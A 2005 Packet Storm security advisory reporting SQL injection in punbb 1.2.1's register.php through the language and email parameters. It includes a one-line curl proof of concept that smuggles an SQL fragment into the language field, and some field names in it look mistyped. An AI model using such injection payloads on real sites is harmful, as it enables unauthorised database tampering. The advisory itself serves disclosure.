advisory001.txt

2005-02-28T00:00:00
ID PACKETSTORM:36338
Type packetstorm
Reporter John Gumbel
Modified 2005-02-28T00:00:00

Description

                                        
                                            `=================================================  
SQL Injections in punbb-1.2.1 register.php  
=================================================  
  
Description  
-----------  
  
A remote attacker can cause register.php to execute  
arbitrary SQL statements by supplying malicous  
values to the language or email parameter.  
  
The email paramter is guarded by the function  
is_valid_email but this function doesn't do any  
real filtering and will pass any SQL statement  
that is formatted correctly.  
  
This also affects systems using the magic_quotes_gpc  
option in php.ini.  
  
Proof of concept  
----------------  
  
This example only demonstrates the vulnerability in  
the language paramter.  
  
curl --form form_sent=1 --form req_username=sha --form req_password1=passwd --form req_paspasswd --form req_email1=sha@punbb.com --form language="English', 'Oxygen', 0, '0.0.0.0', 0) -- " http://target/register.php?action=registerer  
  
Will create a user with the language English, style  
Oxygen and ip 0.0.0.0.  
`